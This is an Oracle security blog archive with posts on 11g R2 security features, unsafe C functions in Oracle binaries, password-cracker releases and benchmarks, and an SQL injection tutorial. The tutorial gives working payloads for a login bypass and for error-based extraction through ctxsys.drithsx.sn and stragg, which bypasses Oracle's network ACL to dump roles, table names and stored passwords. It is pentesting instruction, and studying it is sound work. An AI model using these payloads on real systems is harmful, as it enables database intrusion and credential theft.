Archive for the ‘11g’ Category

New Security Features Oracle 11g Release 2

Dienstag, September 1st, 2009

Here are the New Features Oracle 11g Release 2.

  •  Enhancements to the Audit Trail Cleanup Process
    (Oracle has added several enhancements to the audit trail cleanup process, e.g. set maximum size and age for os audit trails, mobe audit trail from SYSTEM tablepace, purge audit trail records in one operation or purge job, timestamp audit trail records based on their archive date)
  • Enhancements to Directory Objects
    (Execute Privilege for Directory Objects. Since Oracle 11.1.0./10.2.0.5 it is possible to run OS commands via external tables. This privilege allows to restrict the execution of OS commands.
    Auditing of directory objects „AUDIT EXECUTE ON DIRECTORY rds_dir BY ACCESS;“)
  • Enhancements to Fine-Grained Access to External Network Services
    (utl_http supports azon Simple Storage Service (S3) scheme,
    support for IPv6)
  • Global Application Contexts Available Across Oracle RAC Instances
  • Secure Sockets Layer (SSL) Version 2 Support Change
    (SSL is no longer included in the default list of default supported protocols)
  • Tablespace Master Key Rekey: Changing the Encryption Key Password
    (To fullfil the PCI DSS requirements it is now possible to rotate the encryption key)

Some features are deprecated with this version of Oracle:

  • DB_EXTENDED Setting for the AUDIT_TRAIL Parameter Deprecated
    (instead use the DB,EXTENDED string)
  • WKUSER Role and Ultra Search Schemas Deprecated
    (The WKUSER role and the schemas WKSYS, WKTEST, WKPROXY have been deprecated)
  • Database Configuration Assistant No Longer Provides Default Security Settings
    (Audit options and password policies are automatically added to the database if you use DBCA)
  • ALTER USER Clause AUTHENTICATED USING PASSWORD Deprecated
    (btw „IDENTIFIED BY VALUES is still undocumented, see Oracle documentation)
  • Password for the listener.ora File Deprecated
    (According to Oracle it is no longer needed and will be removed in Oracle 12)

Tutorial: Oracle SQL Injection in Webapps – Part I

Samstag, Januar 17th, 2009

This blog entry will show a SQL Injection example based on a JSP application (tnx to Slavik) and Oracle 11.1.0.7. An Oracle SQL Injection Cheat Sheet is available on our webpage.

With Oracle 11g, Oracle introduced some  security enhancements by default, e.g. the ACL for PLSQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old well known tricks like the usage of utl_inaddr are no longer working for non-DBAs in 11g… The following tutorial will show how to bypass these restrictions and will show some new tricks…

First we start with with a vulnerable webapp:

Oracle SQL Injection Picture 1

In this webapp we can login to an employee directory. If we try to guess a valid combination, e.g. scott / tiger we are getting an error message

Oracle SQL Injection

OK, let’s try to use a single quote ‚ as a user login. And BANG – ERROR

Oracle SQL Injection Picture 3

„ORA-01756 – Anführungsstrich fehlt bei Zeichenfolge“.

If you do not speak german, you can lookup in google for the english translation of this error message. This is not uncommon to receive an error message in a foreign language (if you work internationally).

There are several website so I take the first finding. The translation is „ORA-01756: quoted string not properly terminated“. This is a  common error message of a SQL Injection vulnerability.

A typical SQL Injection string is

‚ or 1=1–

If we use this string, we are getting the following result:

Oracle SQL Injection Picture 4

By using ‚ or 1=1– we successfully logged on into the system. But we are interested in the data not in the account of the webapp.

Oracle SQL Injection Picture 5

We are able to inject our own code. This page does not return data from the database so the usage of UNION SELECT is not an option.

But what are now the next steps?

1. Enumeration of the database:
Let’s find out the version number of the Oracle database:

Now we try to inject the following command in the login field

‚ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–

Oracle SQL Injection Picture 6

Again an ORA-01756 error. This time it is a different problem. The field for the login  is limited to 50 characters but our string we are injecting is longer. That’s why we are converting the POSTs to GETs.
The webdeveloper plugin for firefox can do this (+ many other different ways like saving the webpage locally, removing restrictions online, …).

After doing the conversion from POSTs to GETs we can modify the injected string in the URL:

Oracle SQL Injection Picture 8

Again we are getting a german error message:
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.

A quick lookup shows the english translation:

ORA-24247  network access denied by access control list (ACL)

OK, the default hardening from Oracle is working. We are not able to send information via DNS or create a specially crafted error message using utl_inaddr.

I was looking for an alternative and I found the following function :
ctxsys.drithsx.sn

So we replace utl_inaddr with ctxsys.drithsx.sn (+ and one additional parameter).

Our new injection is looks like:

‚ or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))–

After injection this we are getting the following error message

Oracle SQL Injection Picture 9

ORA-20000: Oracle Text-Fehler
DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 – Production ist nicht vorhanden

The error message contains the Database version. The reason for this behaviour is our injected string contains the result of the query  (select banner from v$version where rownum=1) in the error message. This query returns the first row of v$version.

Injecting error messages is normally limited to 1 column and 1 row. The limitation of 1 column can be bypassed using the string concatenation || (col1||col2). To bypass the limitation of multiple rows, most pentesters enumerate through the various columns using the  rownum.

But Oracle 11g offers a new function: stragg

This functions can convert multiple rows into a single row. In one of the next tutorial I will show how to do this in Oracle 9 and 10.  We can now use the function stragg to get all columns in the error message:

‚ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||‘ ‚ from v$version))–

Oracle SQL Injection Picture 9a

Now we have everything to retrieve all data (according to our privileges) from the database

Let’s see what privileges we have

‚ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||‘;‘) from user_role_privs))–

Oracle SQL Injection Picture 10

We have CONNECT and RESOURCE role.

The next step is to get all tables with a password column:

‚ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||‘.’||table_name||'[‚||data_type||‘];‘) from all_tab_columns where column_name=’PASSWORD‘))–

Oracle SQL Injection Picture 11

There is a table called SHOP.SHOPUSER. We are now using the following command to extract all passwords from this table.

‚ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||‘;‘) from shop.shopuser))–
Oracle SQL Injection Picture 12

Using this approach we can retrieve all table content without using UNION SELECT from the table.

SUMMARY of the used injected commands:

‚ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–

‚ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||‘;‘) from user_role_privs))–

‚ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||‘.’||table_name||'[‚||data_type||‘];‘) from all_tab_columns where column_name=’PASSWORD‘))–

‚ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||‘;‘) from shop.shopuser))–

New version of cain with support for 11g passwords

Sonntag, Dezember 14th, 2008

2 weeks ago, Massimiliano Montoro aka Mao, released a new version of Cain & Abel.

Here some of the new features of Cain & Abel v4.9.25:

– Oracle 11g (case sensitive) Password Extractor via ODBC.
– Added Oracle 11g Password Cracker (Dictionary and Brute-Force Attacks).
– Added support for Oracle TNS 11g (AES-192) in Oracle TNS Hashes Password Cracker.
– Added support for Oracle TNS 11g (AES-192) in Oracle TNS sniffer filter.
– Experimental SQL Query tool via ODBC.

Cain Screenshot

The  AES implementation of Cain is slower than the implementation of GSAuditor (6,172,839 vs 2,654,719 on a 2.4 GHz C2D E4600)  but 2.6 Million passwords per second (via brute force) is still quite fast.

Massimilano wrote also 3 interesting whitepapers about the TNS authentication based on László Tóth work. Instead of using the oran10.dll/oran11.dll Mao is using the OpenSSL library:

Oracle 9i TNS 3DES authentication details 
Oracle 10g TNS AES-128 authentication details
Oracle 11g TNS AES-192 authentication details

Looking Glass and Oracle 11g

Freitag, April 11th, 2008

Yesterday I read an article about Apple Quicktime and LookingGlass. I downloaded the free tool from the website of errata security.

Here are the results from a test with Oracle 11.1.0.6 on Windows. I have scanned the Oracle Home and the tool found 518 Oracle files with dangerous functions like strcpy, sprintf, sscanf, strcat, …

Output Looking Glass

The Oracle executable (oracle.exe) for example is using wsprintfA, strncpy, sprintf, sscanf, _vsnprintf, _snprintf, vprintf, strncat, strtok, strlen, strcpy, strcat.

Oracle Password Cracker Benchmarks

Dienstag, Oktober 9th, 2007

Today Laszlo released his password cracker woraauthbf for Oracle, the fastest windows tool for cracking Oracle passwords (supports the new and old password hash format plus cracking the authentication attack).

On his webpage Laszlo has a small benchmark comparing the 3 leading password Oracle crackers checkpwd, orabf and woraauthbf. According to Laszlo’s benchmark checkpwd 1.22 is the slowest cracker (but only out of these 3).

I was surprised that checkpwd was so slow comparing to the benchmarks I did on my systems. The reason for this is bad result was the way how Laszlo performed the tests.

Laszlo was testing only 1 password hash. The implementation of reading of the dictionary file is slow that’s why this affects the entire result of checkpwd. In the real world you are normally testing many password hashes and not only 1 hash
That’s why I run a benchmark how long it takes to crack 40 hashes (instead of 1 hash) with the new checkpwd 2.0 which supports reading passwords hashes from a text file (to get rid of the file reading overhead). I run the tests on my 2 GHz Core2Duo.

woraauthbf 0.2 1.103.773 pw/s (Laszlo: 515114 pw/s)

checkpwd 2.0 637.263 pw/s (Laszlo: 193.168 pw/s)

orabf 0.76 400.000 pw/s (Laszlo: 311.994 pw/s)

Checkpwd 2.0 was nearly 2 times faster in this benchmark (just by cracking 40 instead of 1 password (637.263 vs 309.057)).

In checkpwd 2.0 we will focus on intelligent password cracking instead of pure power but we are still interested to improve the speed of checkpwd.
Here some new features of checkpwd 2 (released next week)

* cracking APEX passwords
* support for Oracle 11g
* support for Oracle Password History
* intelligent password collector
* many new options
* …